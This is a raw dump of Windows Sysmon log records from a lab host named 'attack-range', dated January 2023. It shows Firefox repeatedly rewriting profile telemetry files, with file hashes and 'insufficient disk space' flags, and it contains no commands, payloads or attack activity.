Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=0867E32B635EC3D90B67D9CFF3B05AD5,SHA256=C684DC5F4BAAFF7C81729611083299E786AD6A94CCC341ADC75D51FB6ADD5677,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.358{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A899F3AF69DF480841DA8FC1A2EEDDA9,SHA256=D58D78615B1E26230303572BB7FD3ED121F118CB2F1E4FAFC3D83922720353D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.357{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=648011640232BE39504EEC27B0CE7CFA,SHA256=E40C1111B44A7D44D4EEFF02BEAE26C7D816DF85E4EB1B447EC0F66ABF21604E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.356{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=C3C0338ECF1AEC4A194934AA84DE8416,SHA256=784AD3A16808348EE19AE35110E4E4D6E3D0F319CB65EAC857032C4B52977E0E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.355{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1A0BFBB4784E6787F0BF8A5F42A25F70,SHA256=0CCAAE0E77FF6987405D2055314EF67547C5030348E7F824B54D749D08E9A2BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.353{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=7B9A732A8F4CD4A3493E3F1C9044808E,SHA256=8EB9B3EF281BB8CC7900FE1C6E8DE8AB9FF490AB37F6C20AF49B610F7FFE0D30,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.352{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=45F5645FF422B107C51B8416B1625512,SHA256=8092FB15FF557F4A02300374AFAAFFFBFA43A8C9FD3F1ADABA05BCED7A91BD5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.350{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=FFA545D48947186D9E6180EC3939F4CF,SHA256=7C837C789DAA6ACDAB7DE6E857CBCD0638E33E66190C62A1BB2BC1086B83BD15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.349{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A86A47E6FA0759973B9EA17BB294C422,SHA256=267D0139FD40AE90C32444219CAE7CBB1B2B3523430DAC222135CB4F42D4D889,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.347{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=C68C400433A832F9A6C9D633D7C2F49A,SHA256=F33EB4844B32EA2B13E8569F54556BA426AE91866083E87E514C8BD9C75FB400,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.345{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=FE605D808816E04C040CABDBC143F0C7,SHA256=6DC4A2A391957F0DF7575719FE6C342C91B4C2BE4D5246A1A2DB033BB8E1DDFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.344{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=6308B97EC7C4A926FBFC48ADA3ACA87C,SHA256=23669BEDFABCC988F6696C4BF03252336B53803464006E3FAE97BEF160CA90AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.343{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=BFC0F1AAA587FC5EE5A1D9B3612FB0F3,SHA256=30F88CE7EAA7D36997754BF47DC85628089B64DDB67EA7E8F26B74E85FE4AD31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.342{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=DF355B813F4609D4E7FB91687A6485EE,SHA256=9157FF5357B877BC4157D8847B183142E7C49CF59EF1FF1FB2BED3488EC14A16,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.340{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=82CACA17933351F10E8AD7B42912A5DF,SHA256=9810D6BAF32C8FFC019EC4541A8AD73D4311FAA6663F54D2343DF319578B5E57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.339{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F54A7042692269EE478456AFE540147F,SHA256=1777FEAA7954CF1E1A19D20741A13938F0C1531D3F7960A86F7FBF7A65A4DFD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.337{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=212DB0123D13BAE7EB0CD3027E53F143,SHA256=A5543DE5E446AAF67B0536FDBD0CC05F84BE893C8AAC15D4D56AD0D41B5B6CEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.336{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=99CCA66EB754EC12ACFB03696D910DAB,SHA256=34B8D9D83DABFAF6D94FE6522B963064C4C20D14DD01BA6569E3A9C0CB89CB64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.335{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=FE40207F5144ADA1CF3050A8A9DF1706,SHA256=EF585921721E3026F450930B351DB41D4A80672F11A0B1E967A8CC4C855E267D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.333{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=0F5CE3847FE7DF454CB489614A7A1F13,SHA256=BFED51AEC57C9DCFF3121BA259955FD8F6615EFCEBE926FA84AAD7F0180DE08E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.329{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=7E6846484FDC69FF5B114947F223EF7E,SHA256=A7CE838A243D4A8EAD76EE66F65B29A19453C3EDBDBC8A8ACEAAB8CA5F937F4C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.328{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=616E239F99A5652E19B69EACC2DED2B5,SHA256=9CA58F2261212CD457660BE251A7AE1704DA70E198C7368E6C06568236C3F95A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.327{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=CD7C87009D7FE35287BDF8195549941C,SHA256=08E353C65719D6178D47DFB4267594A63886FF4B1A0DA81EC967C9E31E099CDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.326{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=96142F93AF73D2420A64F3804D00E46F,SHA256=DF78CE1228C52348559F6865F9A88705F5F4E2EA4040BCD56498CC8F4BBCABE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.325{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F5005AC22D1DF539D46F7A66BEDDD6B3,SHA256=1F446A17FFED3355F1852AC3C42036FBDA447BD8C3A977CB91E1F03D324B473D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.324{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=3A97870E356E6485BE235BAF25950DA2,SHA256=50C24EF5D9B934C15AC27D8136255542515D3BF62DD79AAF8DE466BD25CAA696,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.323{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=98458ADF020181B4F36681AF4A25B77A,SHA256=438D9B53BDAF4F5AA270F3D18983528A86615488429E792F97FC6950BB224463,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.322{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=C8DB810F58E9FA0F0D777A0A63ED1663,SHA256=8B874D3B45C90331514BA03E0C7D957611E8FFA5B93CFA84BA1EB577ECC8751E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.321{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=0E8729DDCC9B02AEA29EE947140655D0,SHA256=2F339D02DDF88F4D521C6712DC65DF2138B2F1DA4192ABA60C75D77092E5119F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.320{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=54DCD21684DCB3835A25F9FE3BF6DFF0,SHA256=1317314C2565743CAA162E4AE46359FF269F40F337715CB7652F9FAAF36E4C56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.319{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=70E250D8057108D95899E6D2C6D5F453,SHA256=0FEF2FDEA7547BC05B47D8433B503D6565F2C4D301086257BB41CBA2F4686575,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.318{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=F9E2EEF9017526B25BA0EEB98BC1B15C,SHA256=3A908190A1799B8D49F12CBDEDA2B9DB628A8F14D936672BEDE9DABEC4200EB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.317{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=5CED1A626FA5FD5F1219544523B7487A,SHA256=C66DBD206508E1D195E8793AAC4676A3505D2ACA2423A5536D16AEFE68CBAFAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.316{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=4663CE94525CC276D1A94246EB05783E,SHA256=9BEBAF883BA05C38C25757651AE041860C65399F0FB08315E581E94EBE85A728,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.315{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\protections.sqlite-journalMD5=0E2E99693E9118D1189709889BED08FB,SHA256=C142D33C0EA9705F547B7930F6C558A9B293410E529DDB175289F86AC7B62A26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.315{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=CB620A5F5C8768FAEADB319C0B9E5B75,SHA256=A571C4FA3FDBDA384934C4219A4362C6ED219E4C18A213BC05E20F6CBB56AB29,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.314{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=95877470E4B89C158BEAB1C4CF49C8C4,SHA256=FBBAD1E86E5017B1B9403B1088C6460D9B7999C985C0697647F2102199EBFC21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.312{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=9BBA31F148C489198167C45C7DAAD733,SHA256=14B5DA9F6D8B4256AD9F463757FE759EDADA93FE339D2405EE4B5AE43D08D891,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.311{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=ADAF21D8C572312628012552F728B179,SHA256=39D915B85701ABD3612FECBF0BE3D169A3BB61A73467F679F7D2291D7B7B761F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.309{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=CDFB7F8543717D37F06EAE59D2A33877,SHA256=9B808FEBEC38BFCDCA8AB548F1CE9D8455B32059F971F969A2005C52A3DC9E80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.307{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=96C435B21B035C03600EE69F1E6C8A0B,SHA256=B30B5CF49E9E33B028E1221D4D4B491D7C541F20CA86350E8E3231D14E8C069B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.306{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=17D29DC27C89010BF01F2B7D450EDB41,SHA256=16BB143C39E5DBB39D89CA14009B61234F275CE753EC07067444BC840608F2C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.305{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=41BD76485FAC509BBBCA2128A1A56A19,SHA256=8FC3E4D10E908168BCCD616A21F38138EB6D7FCB7EBE4F87239E50F51F363CA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.302{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=5A4553A628A92DF35D890AC28F9A5489,SHA256=D57CB00B7E3D6D528BAB406094B5D762393C2F9089E0CE1560A1D85AE6A04533,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.301{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=7C26D3F3359FF63F71427E5760DA6521,SHA256=3B52EF17E00BF97DAA12C7B7E3E60F22D90719637B0527ED89762A584AB68CAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.300{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=43A3BABF79B6808C651D1AA6CE35E218,SHA256=A089C4CEEEAE98E913F8A35C4006E9C3E9656A257DA01EDB797264A6EF50E9B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.299{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\events\background-updateMD5=3176166146A8AF9243868BF85FBC6A7B,SHA256=F67F47434AECCB7F87FD6532EB04EBC0200D5BEE81CAC8FA8ABD90B70CBFCE5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.298{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=606CF2008D207177944958834DFA9EA6,SHA256=939F3AB56B908F694F123A4E7A039C9E04A1AB01F05B69342D1EFD293B0D1058,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.296{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=606CF2008D207177944958834DFA9EA6,SHA256=939F3AB56B908F694F123A4E7A039C9E04A1AB01F05B69342D1EFD293B0D1058,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 